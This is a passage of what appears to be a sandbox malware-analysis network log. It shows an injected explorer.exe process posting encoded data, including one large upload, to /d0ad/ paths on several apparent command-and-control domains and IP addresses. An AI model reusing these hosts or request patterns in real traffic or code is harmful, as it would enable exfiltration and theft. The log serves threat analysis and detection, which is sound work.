31 36 51 6e 78 52 35 2d 43 78 67 58 69 76 66 70 7e 6a 6a 71 45 46 79 72 39 68 79 53 6a 6f 4b 47 34 4e 4d 35 44 57 39 74 6c 31 68 52 79 74 6d 77 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=JQcb~T~DYKz4(TpDhDFGvMaCcCny9n8vutAgBGNkxwJWOmqG4F54G5HidTYq19bmv3eaWU0wyO3FWaXL3wFR6PwxJ3M6Gwhj(oNg6pZl1lih(-yPn7ktNyH2FWy9603l6bOlSw0ExnmYhXSJqrIielUr8Ic_1xIDHEPw78EvrScyFIcHV5E_B7mS8MCGHIEejTo_xSOWlhRLM4lDmLSxXadOInNItrLgTdf-Q816B7(PeZ20zX0MszEWeO0pI2kuqui4jLr-(ni2dpf1u_ADbOFJMoItfnyCuGgmQhleqWF0WoM_Y8cM1tO-eU0c8vrJa8UBqvfkD-Dn7yr1pXhnkvQdOQqC86IgbZHqMIe6SGxHQZ5mt0Su7B~ptbHrp3qCbKKec4gT(p25tuqPggYinmHJRVsZPBJyCZ(WD2CbSR3Rm67eQrgP2Rxz(YJ2oPlXWTDiJyyPufdUFN8AWUc4Tr16QnxR5-CxgXivfp~jjqEFyr9hySjoKG4NM5DW9tl1hRytmwg.
Oct 26, 2022 13:16:39.245493889 CEST	569	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:16:39 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d b3 55 d2 57 b2 b6 d1 87 4a 01 00 37 30 80 5f 23 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 32)N.,(ON,(JMUWJ70_#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49846	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:38.351721048 CEST	330	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 67 78 70 70 5a 77 6f 54 51 4c 4b 68 56 67 36 30 4e 67 54 7a 51 79 61 6b 4b 46 6c 73 53 66 50 38 4a 38 31 6b 66 4d 37 43 37 72 77 2d 4a 4c 49 47 30 67 53 65 38 34 50 53 75 63 4a 4e 78 32 42 78 73 5f 72 6e 41 4c 37 32 6e 44 69 51 73 46 36 75 69 76 35 45 63 53 4f 62 4f 79 63 4f 67 6c 4a 54 42 77 62 50 56 4a 70 53 4f 6e 42 62 44 4c 59 57 36 54 30 62 6e 53 38 37 79 73 4b 53 54 53 59 65 47 64 30 73 45 52 38 54 5a 56 38 73 59 71 28 54 57 76 79 43 38 4f 57 4a 49 38 6a 45 32 45 66 42 70 4d 49 5f 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=uhh96udzgihpgxppZwoTQLKhVg60NgTzQyakKFlsSfP8J81kfM7C7rw-JLIG0gSe84PSucJNx2Bxs_rnAL72nDiQsF6uiv5EcSObOycOglJTBwbPVJpSOnBbDLYW6T0bnS87ysKSTSYeGd0sER8TZV8sYq(TWvyC8OWJI8jE2EfBpMI_~w).
Oct 26, 2022 13:15:38.381550074 CEST	330	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:15:38 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.11.20	49864	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:41.261776924 CEST	573	OUT	POST /d0ad/ HTTP/1.1 Host: www.budgaugh.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.budgaugh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.budgaugh.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4a 51 63 62 7e 54 7e 44 59 4b 7a 34 28 54 70 44 68 44 46 47 76 4d 61 43 63 43 6e 79 39 6e 38 76 75 74 41 67 42 47 4e 6b 78 7a 70 57 50 56 69 47 28 55 35 34 48 35 48 69 44 44 59 72 31 39 62 33 76 33 47 57 57 55 49 4b 79 49 37 46 57 74 4c 4c 33 43 74 52 6f 66 77 77 4d 33 4d 34 43 77 67 34 28 6f 52 30 36 70 4e 31 31 56 6d 68 7e 39 71 50 30 34 63 71 46 43 48 77 46 57 79 78 7e 30 32 61 36 62 36 31 53 77 34 45 78 6b 43 59 6e 68 57 4a 6f 59 67 69 54 56 55 73 31 6f 63 67 37 52 49 32 48 45 4c 4f 37 38 45 52 72 54 49 79 46 4b 45 48 57 2d 59 38 50 37 6d 53 78 73 43 42 44 49 49 43 6a 54 31 35 78 54 36 57 6c 6a 52 4c 4e 59 6c 44 77 59 4b 32 42 71 64 49 4d 6e 4e 6c 70 72 48 34 54 63 36 4e 51 35 74 36 42 4c 37 50 66 75 4b 30 79 31 63 4d 6c 7a 45 75 41 4f 31 30 54 6d 6b 79 71 75 53 65 6a 50 62 45 28 6e 47 32 50 64 48 31 34 4b 38 41 57 2d 46 31 50 6f 49 38 56 48 75 65 75 47 77 69 51 68 6c 4f 71 58 42 30 57 59 38 5f 62 2d 30 44 30 64 4f 48 4b 6b 30 7a 79 50 33 58 61 38 49 4a 71 75 33 30 44 34 50 6e 37 53 72 31 73 32 68 6b 71 66 52 56 4d 51 72 46 34 36 4a 6d 62 5a 44 63 4d 4a 61 41 53 79 42 48 57 70 70 6d 7e 55 53 74 72 52 7e 74 37 72 48 78 37 48 71 43 62 4b 58 70 63 34 6b 54 34 62 6d 35 73 5a 75 50 79 44 41 69 6c 6d 48 48 52 56 73 49 50 42 30 45 43 59 47 48 44 32 79 31 53 53 48 52 6e 76 58 65 54 75 4d 41 7a 68 78 32 39 6f 4a 66 73 50 67 4e 57 58 6a 36 4a 32 57 31 76 73 70 55 45 4f 55 41 63 30 63 37 59 72 31 67 41 33 78 39 6f 4f 4f 74 67 58 58 58 66 6f 37 2d 6a 70 45 46 32 4d 4d 39 6d 53 54 67 59 56 49 45 4e 63 36 42 79 38 74 46 7a 55 32 48 30 33 68 4f 6f 62 6b 58 67 39 65 48 59 75 7a 53 59 79 66 6f 4b 30 76 34 73 67 68 61 52 6d 6f 74 30 54 45 4a 64 39 74 53 64 4a 5a 75 6f 6a 78 2d 76 4e 4e 62 66 44 6a 35 66 43 72 35 5a 57 6f 75 76 75 30 32 57 6d 47 49 30 65 4a 2d 62 48 32 77 76 59 4a 70 65 35 6e 52 4a 54 6a 56 61 74 36 4e 71 4a 56 56 79 48 50 59 52 53 4f 41 6f 62 57 72 76 70 75 63 4f 4b 59 46 79 67 31 50 43 70 6a 42 6b 5a 49 71 46 61 7a 37 28 4d 62 6f 6a 38 6a 65 44 77 51 69 4a 5a 49 6f 34 57 53 49 75 76 6c 30 4c 6c 49 69 6e 59 58 32 47 30 32 32 74 69 45 75 35 30 6d 74 68 78 59 5f 58 51 64 68 5a 61 73 50 73 70 6f 37 48 76 6b 39 73 38 33 6c 38 51 56 67 4e 66 28 58 63 66 70 6b 67 2d 74 46 43 57 7e 62 4c 36 71 70 71 34 6a 4e 71 4b 32 34 54 30 51 51 4f 6a 43 42 43 6b 4f 6e 6d 6a 37 76 53 67 41 34 6b 48 28 48 68 73 52 65 47 7a 48 32 6d 70 33 54 6b 75 38 47 38 46 57 4c 55 65 31 33 61 71 59 7a 6b 6a 65 72 54 59 6c 50 30 67 48 74 68 67 28 52 54 47 6f 4f 37 71 38 41 6a 6d 54 4e 44 4c 4e 58 61 4d 64 4d 4c 67 63 55 5a 78 34 76 49 5f 48 67 69 51 4f 44 45 52 41 66 4f 32 45 4a 36 75 68 67 75 66 55 35 63 5f 43 31 77 66 35 58 74 34 44 66 67 4b 71 7a 72 4c 65 7a 44 71 46 52 5a 36 63 42 45 5f 48 76 7a 67 6f 69 4d 5f 53 62 42 39 61 44 65 66 38 74 6b 78 55 38 48 67 62 39 45 6c 56 68 4a 77 71 61 7e 68 6f 43 61 73 55 68 56 63 36 6a 4a 6b 65 68 33 6a 61 4a 4c 4b 42 48 4a 5a 32 78 68 33 36 42 58 44 52 33 48 4e 67 6e 4a 36 7a 4c 46 6b 55 49 62 4d 61 64 6f 77 69 59 53 36 50 44 6d 5f 74 31 73 75 76 5a 70 42 44 79 5a 62 50 4b 58 79 6c 48 61 5f 7a 6b 78 58 36 43 7a 49 41 74 42 49 6b 45 31 77 41 42 45 4e 49 47 56 5a 41 4b 74 44 37 32 33 63 77 71 31 6d 43 43 55 57 77 73 62 51 39 58 76 56 32 45 6b 76 76 54 4f 4a 51 58 54 42 52 58 63 4d 41 6c 6b 45 72 71 39 4e 42 37 4b 36 4d 77 37 51 64 49 70 73 52 56 4d 43 35 73 38 45 4a 79 79 6c 45 55 4c 42 59 6b 4f 36 77 6f 58 39 36 45 34 77 55 42 64 53 75 4e 71 76 28 34 45 66 50 70 52 34 61 52 34 58 70 79 78 6d 69 73 6f 56 58 5f 31 52 6d 32 43 78 78 77 51 37 4f 65 4c 65 64 4b 45 5f 65 38 5a 50 54 51 4b 4f 54 4a 61 62 74 34 30 4f 65 52 56 54 68 58 64 30 6b 6f 76 5f 37 49 6b 44 4a 6e 7a 59 50 56 77 35 6b 45 39 30 74 6b 70 49 47 57 43 6d 49 69 30 74 6e 49 56 4b 42 4e 56 33 65 44 68 56 61 39 73 4a 6e 5a 48 67 6b 65 34 6e 75 74 58 74 42 4d 49 31 50 2d 46 42 66 50 6f 58 55 42 6a 6a 37 71 7a 6a 6d 7a 78 30 6a 5a 71 41 76 6e 46 5f 6d 5f 6f 4a 62 6d 76 57 78 50 51 31 74 4a 34 47 74 71 46 75 68 6a 4e 58 61 6f 47 67 6d 59 62 54 4b 49 59 6f 4b 76 6d 63 52 4e 68 4a 48 79 53 57 4e 71 49 57 6d 61 38 4f 7a 37 50 5f 53 46 52 4c 36 Data Ascii: jXu=JQcb~T~DYKz4(TpDhDFGvMaCcCny9n8vutAgBGNkxzpWPViG(U54H5HiDDYr19b3v3GWWUIKyI7FWtLL3CtRofwwM3M4Cwg4(oR06pN11Vmh~9qP04cqFCHwFWyx~02a6b61Sw4ExkCYnhWJoYgiTVUs1ocg7RI2HELO78ERrTIyFKEHW-Y8P7mSxsCBDIICjT15xT6WljRLNYlDwYK2BqdIMnNlprH4Tc6NQ5t6BL7PfuK0y1cMlzEuAO10TmkyquSejPbE(nG2PdH14K8AW-F1PoI8VHueuGwiQhlOqXB0WY8_b-0D0dOHKk0zyP3Xa8IJqu30D4Pn7Sr1s2hkqfRVMQrF46JmbZDcMJaASyBHWppm~UStrR~t7rHx7HqCbKXpc4kT4bm5sZuPyDAilmHHRVsIPB0ECYGHD2y1SSHRnvXeTuMAzhx29oJfsPgNWXj6J2W1vspUEOUAc0c7Yr1gA3x9oOOtgXXXfo7-jpEF2MM9mSTgYVIENc6By8tFzU2H03hOobkXg9eHYuzSYyfoK0v4sghaRmot0TEJd9tSdJZuojx-vNNbfDj5fCr5ZWouvu02WmGI0eJ-bH2wvYJpe5nRJTjVat6NqJVVyHPYRSOAobWrvpucOKYFyg1PCpjBkZIqFaz7(Mboj8jeDwQiJZIo4WSIuvl0LlIinYX2G022tiEu50mthxY_XQdhZasPspo7Hvk9s83l8QVgNf(Xcfpkg-tFCW~bL6qpq4jNqK24T0QQOjCBCkOnmj7vSgA4kH(HhsReGzH2mp3Tku8G8FWLUe13aqYzkjerTYlP0gHthg(RTGoO7q8AjmTNDLNXaMdMLgcUZx4vI_HgiQODERAfO2EJ6uhgufU5c_C1wf5Xt4DfgKqzrLezDqFRZ6cBE_HvzgoiM_SbB9aDef8tkxU8Hgb9ElVhJwqa~hoCasUhVc6jJkeh3jaJLKBHJZ2xh36BXDR3HNgnJ6zLFkUIbMadowiYS6PDm_t1suvZpBDyZbPKXylHa_zkxX6CzIAtBIkE1wABENIGVZAKtD723cwq1mCCUWwsbQ9XvV2EkvvTOJQXTBRXcMAlkErq9NB7K6Mw7QdIpsRVMC5s8EJyylEULBYkO6woX96E4wUBdSuNqv(4EfPpR4aR4XpyxmisoVX_1Rm2CxxwQ7OeLedKE_e8ZPTQKOTJabt40OeRVThXd0kov_7IkDJnzYPVw5kE90tkpIGWCmIi0tnIVKBNV3eDhVa9sJnZHgke4nutXtBMI1P-FBfPoXUBjj7qzjmzx0jZqAvnF_m_oJbmvWxPQ1tJ4GtqFuhjNXaoGgmYbTKIYoKvmcRNhJHySWNqIWma8Oz7P_SFRL6AW3eljmKLs8RA3L76tYU15jgRJq5KdoETQWFcZi72Vu65bqP7bXlg2b7aY67-umWYth5hkwtC9qmsAV~jprIcIg4qIY7_tnF8a6nHVzMgxwM7jisM9LsnvMO1Eai88_6RFe1sr3O4jzJ50XyOJ9kK51ycFcY02a6nVVsv8lQN1k9ndEODnHd9pHCdRA2tvKSEsB~kxrqVMG6EoVLs2IYlhxZvw2Zskq8Hu8BYBtVIdQ1MIyUVkrjEFzJeuQLJh2xWXfzi(1xHGtwPD4QZK_79I5blXvx_fOkX9XueXnDQD9mjViM3Yvlgx8FEo3woGsWDcQTG9NC1wYt7(VpvxxPolrAhaJs8t3pE~7(3K-tPU7D5oKC7dM(CulQTQj9TMSXB9blcJaN3l6OSFETo8lva7IxxA3S2bOJ6Ic(FuFtpmIsK8Baxhntjb93i9o0892SV10oewJblhYg9ZoUisWQlLw9PSzBNy8oaX3xhALsumwpcp6YJw7evv0FOP-BmoKM0WXK0pP4lD2nRPqo_ih9SZYYDPVCFcAPYhWSynkQ7ZC1eI0QbwB5zvjw2yfZpxOHquSbisD7N45eM(5its5QZ5ksdoTfiGCslCoAATqwB2nccexOvalkiohAIewSzQrc1GfmxX1M246Q2fQR-PG5G1DwkAo0KN5CmHLmCU23KO3ya6fAR2kHrw2~xbW68br3oWSd8UY~iON1EuuZvoN9c~QWYfn~YbteWlXihQXcP07x9jJMD0F1rJ4DaxCrltD4SjPEdYdbLkQiywY7HPxT5PgtK9jyatP1o9ACHeo1degFEH_9d8mK7T0CXjB6UbqTV9imq~yQuZ1NVWtab0Dh71g3zTZ~hiEp24zyPy9UvP4gjuVsDdAkEtGL9ZUgZGttoytBiDUOJtXtHZWnC7c3kMBNhICXFKLCzvh6R4ez2yR5jAS3M8o3danasvrwRpofc2YrtsDtTwMnVh_cYm3I5AmXyOcpMH7D3KZ4a8dBPnJl_eE0X3D47gTfXfYEmTNg34uQn16zCIsM_iKD6SgSIIOXWAhaVulh8uKz7iaViW8GdoWC-AoJh4NEEJG4R4ML6fEQvmY2v1QjwGG4bVgzjgcpTKXfyD-MgqkFYmZcSZKV_gqnjD1Mjp3~SEU9oOYIt6c6ecuB86SKWo3gjBF8xco52vc0Q6jmJuwOnH-ZaeMJMJbYadbD2sL9aeM1OC8qzKbIrqmMv4nFV23A1Ps4SMaS0o2JIgC0tZwW7piJ63UyrYP~lfB83u1yX2V~jkfvExfQ_D5wt68ehAjRnw91S57(063dutK(GvMVHyeG5E18mu9s_Q_hgcTSqCIPyJcYys6L-uLQKGnCCRR5V9NlCk43QMnuzKciry3A-r7G1AdR3XrtlyjJfgvMDSr7kyWokVGwoJiivyQ1U(FQVULZma3f_uxp3~mCP~_(Ly6EUK0R3XCnYfka_kYudZTYWTJYFbh5yNXib6eHWlXzHxMvMY5qswWQqQGHD(z4UliXwGekjytoVsuUP5SC4dV4azs45Kc5aWZBOBy4a7px9lwBk(7oudh8d3hhtFo7KJ46dAU95PKErRNrQwMoT~hU-(NCiw-B6m9DfIlwMa6q57A9KKsxciwG9wmMXS3XegapQWww3gLWEQvYeffruwoj_Mrb9wQIRpKvofIQCfGQa7WTnQZXHM6PTE5TtKcorxX9lETgkzjik~xoU7v4lcPYZgLe1ukHLW6LekKLAhX7YGz8JnmAN46trP7NtjKGGLVXl9hwCIerjS1sO9TfNE2tFVh4Es2GWLKOCAi97i6v_HT4b2e2iwrnucDj6PFEqmMy31gcxjfIT2tX_S5wFDr0OCWGsAyTxFOMyOwCDmCkZ1Yx4PArk7Dm65nnxj88s3MhHUfcX71ex(eQLhMJF5CUSSTJ0aor83YgmnPKkzG(O566cdtR0Wwjq2Ef55ngvQM5XjLfPqwOlL2oyDBrlytDK4jAseQWDPq9bGlKP(1RifkJo4T5aQ_~5OtV59DJ7ghuUynkYibktMYwvpoWM7WrnCMPKHxSR3O9EenrEbDdkeylRWhpTWNHQk8yIi-z3OHFApzjEosHO3tmK
Oct 26, 2022 13:16:41.261876106 CEST	582	OUT	Data Raw: 59 31 75 45 59 48 46 45 61 46 36 69 48 4e 63 77 63 75 39 6f 6e 67 5a 36 33 53 63 4c 72 4f 52 32 4b 56 44 47 39 69 44 44 69 6f 4d 4b 74 38 33 34 70 65 5a 6f 7a 45 6b 79 42 4d 42 71 65 59 69 75 36 38 50 7a 35 75 4e 35 72 6f 75 69 54 72 63 56 49 71 Data Ascii: Y1uEYHFEaF6iHNcwcu9ongZ63ScLrOR2KVDG9iDDioMKt834peZozEkyBMBqeYiu68Pz5uN5rouiTrcVIqavGPUB8u8skioenFLaVUsYY3hyQwK5uxyggvQ3reQPThj35jpasbX5OVxr~SSY1q6TP1n1vuBbNrk0qk453Nxp3VxEBftL4N9fBirFYqvlM506JwPQtC7OrVXH6vtKZoFmKUHkYoMOnKoalv5xmI1s7ydk(vGvhlx
Oct 26, 2022 13:16:41.449903011 CEST	584	OUT	Data Raw: 52 4c 6b 35 35 30 68 37 34 46 77 68 56 61 4d 5a 54 6a 75 51 52 31 56 6c 78 51 38 59 78 38 46 35 45 37 37 4d 42 30 6a 38 67 62 74 74 79 47 45 43 72 46 68 44 6e 4f 38 58 36 52 72 41 76 62 50 43 4f 79 6e 50 75 68 31 39 6d 75 30 5a 51 47 7e 62 67 50 Data Ascii: RLk550h74FwhVaMZTjuQR1VlxQ8Yx8F5E77MB0j8gbttyGECrFhDnO8X6RrAvbPCOynPuh19mu0ZQG~bgPLQ2XlVNioz1yAKsNAfwKC2BYW_SgHEzoENZpekvJoaKK9fU8yoIKLoLop-OL7yHTNzY9zhITnFNEOAO8cMS1qpVSOUfVxvEjaD3VjYY297h8Kwau5E8oSw5HLy42I-xiCAJCN5cJHTaA2eC3mLoEZyjUt9vbQdWG~
Oct 26, 2022 13:16:41.450198889 CEST	588	OUT	Data Raw: 67 47 6c 53 64 4a 4f 49 5a 53 4d 4e 74 45 55 50 4e 4c 67 73 32 46 36 67 35 6a 74 62 66 4a 76 6d 68 41 6e 65 45 50 39 43 64 65 79 65 38 61 70 37 36 55 4e 4a 79 5f 4b 35 53 49 30 4b 76 4e 69 6e 33 6a 38 4b 71 34 28 6e 54 59 61 72 39 6a 54 49 66 48 Data Ascii: gGlSdJOIZSMNtEUPNLgs2F6g5jtbfJvmhAneEP9Cdeye8ap76UNJy_K5SI0KvNin3j8Kq4(nTYar9jTIfHhkwhgttTdfoxJQJKq7mipHM-9KRCZOtTSZBvay0HKQoBe1CrBOR58Dqq8dE9gXdoB-hJWoKSS1fkqwD1r4je~4k5~wi7ZsGQa-NRB5SHNqLC0X2EdieT1u3SRIRKL3Ta~bEUx4f8uA8nRhDecArsT0B5StgQwu8N0
Oct 26, 2022 13:16:41.450370073 CEST	602	OUT	Data Raw: 44 47 4b 59 62 71 61 77 74 6d 4f 38 68 50 70 75 79 57 7e 67 74 34 39 50 57 46 71 42 44 44 6b 37 7e 56 70 46 43 4b 76 51 4f 78 6c 4a 32 30 45 2d 4c 5f 68 4b 69 51 47 4d 31 79 79 42 62 56 32 71 58 34 72 7a 61 72 34 48 70 34 28 53 69 44 64 6a 63 69 Data Ascii: DGKYbqawtmO8hPpuyW~gt49PWFqBDDk7~VpFCKvQOxlJ20E-L_hKiQGM1yyBbV2qX4rzar4Hp4(SiDdjciYwIM7H5UZ63YnhqC2DGGpk1kZ7HRls22J-YhUqv3~FF0bnBefXyTiGR-FzwFwFJX1wWjfssc1q54a5TSeDQvtUaJIDC8MMomwTuPfK5pcXxkdS8LCjsrJlQBmvxlD6tSmZ3oxtbsHC7Ld-DxhQaCn-gvy6MpYEgwS
Oct 26, 2022 13:16:41.450529099 CEST	603	IN	HTTP/1.1 500 Internal Server Error Server: nginx Date: Wed, 26 Oct 2022 11:16:41 GMT Content-Type: text/html Content-Length: 186 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx</center></body></html>
Oct 26, 2022 13:16:41.450726986 CEST	608	OUT	Data Raw: 41 53 66 66 49 2d 48 35 63 57 31 69 72 74 53 4d 32 4e 53 54 31 4f 39 4b 49 2d 54 66 68 6d 48 6a 68 5a 6b 62 44 58 76 56 44 65 7e 66 4d 4e 70 44 4f 72 50 6c 69 56 7a 69 6d 48 67 44 77 4f 30 53 36 68 43 33 49 73 50 53 41 6f 42 68 28 31 4c 62 41 61 Data Ascii: ASffI-H5cW1irtSM2NST1O9KI-TfhmHjhZkbDXvVDe~fMNpDOrPliVzimHgDwO0S6hC3IsPSAoBh(1LbAacO2C8tt_gyeYlfwWWZl-3LraeHhQ98~s(D0ls-k7ROvwTmQhQ-Prg97Bq73KV5kagAfAAKIWcyV8o7bdf1qHkAR5YTO57hbcLYvmSWxhvjxITGyQ(ptYgY~rczyvbBIBJxaC(e05D7zMzdRCcpSz3Gdy5TwDtShMC
Oct 26, 2022 13:16:41.638180017 CEST	613	OUT	Data Raw: 79 64 36 78 4b 31 42 6e 38 46 6b 55 47 45 38 51 44 45 33 39 30 33 4b 50 66 52 57 44 6a 51 46 61 33 50 7a 35 7a 61 47 6e 33 68 46 31 4e 75 35 76 4a 62 31 55 48 50 32 79 6d 42 46 5a 50 6b 4b 76 71 72 38 68 6e 48 4d 7a 72 78 6a 52 44 43 53 2d 68 49 Data Ascii: yd6xK1Bn8FkUGE8QDE3903KPfRWDjQFa3Pz5zaGn3hF1Nu5vJb1UHP2ymBFZPkKvqr8hnHMzrxjRDCS-hISMxW3ozAREfwhYfhYrwTb1pFB5cDXp1neWXNH1~QJdtohoPGZK1NKR8Qhph9LbEsiqShthYflPjJ(99lhLdqjAini7agM2BioRYbitCOiVnjkftF(lvqFR~_17x_81RmZidIFJCn50unbAtL(opSzlMJHwCoFBa0C
Oct 26, 2022 13:16:41.638426065 CEST	616	OUT	Data Raw: 42 33 78 77 34 64 5a 45 66 5a 4c 34 78 58 7a 4e 48 59 37 55 32 6c 4a 4d 58 58 6d 61 56 5a 57 33 6e 36 78 68 56 54 31 74 37 68 77 4b 46 45 4c 50 36 66 69 32 49 6b 6c 53 6c 4d 45 50 59 72 34 38 34 67 37 77 74 63 32 45 59 48 7e 7a 48 5a 49 46 5a 4b Data Ascii: B3xw4dZEfZL4xXzNHY7U2lJMXXmaVZW3n6xhVT1t7hwKFELP6fi2IklSlMEPYr484g7wtc2EYH~zHZIFZKaP6ojz6j4nGcZueIPNVQ1fWHPZ(8YO(pEG2Gz5JF7RQM8GZYI-nS67Ro0gE2wgEuEbd_wVn-K4LVArnZ~jd36lsfeffTZjlvMlUTOYIjN_kquqsoPrsi5tVVy2c7zf68(p6BdVsS2Jiu0QqLEUTFIdwL1VXNxJZ0R
Oct 26, 2022 13:16:41.638605118 CEST	618	OUT	Data Raw: 35 44 51 39 31 56 4f 66 49 57 77 49 33 68 35 66 49 7a 68 2d 36 76 6a 78 57 62 68 2d 48 6a 62 59 41 77 6c 48 6f 66 49 4a 41 4d 7a 54 59 49 69 5a 47 78 7e 79 66 72 51 68 6d 39 78 48 49 79 6a 56 4f 36 76 51 64 51 47 67 51 4c 4b 6b 66 2d 31 7a 46 6f Data Ascii: 5DQ91VOfIWwI3h5fIzh-6vjxWbh-HjbYAwlHofIJAMzTYIiZGx~yfrQhm9xHIyjVO6vQdQGgQLKkf-1zFoo5uVa1fbWpwLDZ~5u5nelLAyf2I7MRVaQ6wxUpkVaTzwQE8PDsyhMmuKRRycd5PUXMvwzUbTCSUq~pBFsgwWJe0w7s0BSUBKGptHj_F7pmSGuGaHnZjdJNP09mWMBsNi1MGAE79_1vseMr7my0zyW5ty0OxBzUra4
Oct 26, 2022 13:16:41.638768911 CEST	622	OUT	Data Raw: 36 45 37 62 63 52 4a 44 68 72 51 38 75 4b 44 30 37 5a 44 52 50 39 6d 79 39 71 4c 76 48 56 61 77 49 56 78 31 30 45 46 44 6d 53 61 4d 57 63 32 4e 31 69 54 30 7e 51 50 55 53 35 35 47 6b 36 63 77 62 6f 28 74 6e 30 70 59 76 4a 62 61 76 4d 70 59 63 43 Data Ascii: 6E7bcRJDhrQ8uKD07ZDRP9my9qLvHVawIVx10EFDmSaMWc2N1iT0~QPUS55Gk6cwbo(tn0pYvJbavMpYcCwV87IAnVlbKMKqyx317iI-wlYDraqWADtoilmAtq4Rotje(j1ho18q3QczJ_k0pPcEsFeD6WkurRofl4o8W5BWZ1IHooCQkSUzH9uIJFXzQd5ye13Ef57Z4BRwdtHTtPG_ltvK54IEzRFKWlwcocuxf7jZWL6f~eZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.11.20	49865	104.140.149.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:43.480526924 CEST	622	OUT	GET /d0ad/?jXu=ES079lGHSpjw2zZqpiB6hd2+bwfOy28JzKwBdlhywRNcHXuvrX4iPpPrJgUvxM/8mUCKQ1JU0ePMCpPawCFs3Mp7IC1gDg4d5g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.budgaugh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:16:45.874608040 CEST	623	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 26 Oct 2022 11:16:45 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Data Raw: 32 33 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 23<script>location.href="/";</script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.11.20	49866	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:51.261172056 CEST	624	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 6d 58 53 36 47 75 68 36 52 55 64 4f 4a 58 49 68 4d 34 6f 34 50 51 34 39 51 75 65 69 38 4c 79 45 4f 4b 38 78 55 51 48 44 65 6e 32 38 61 41 6e 42 4b 49 59 5a 77 5a 50 68 68 69 48 67 77 7a 37 67 53 4b 53 7a 70 37 35 4a 69 72 70 72 66 59 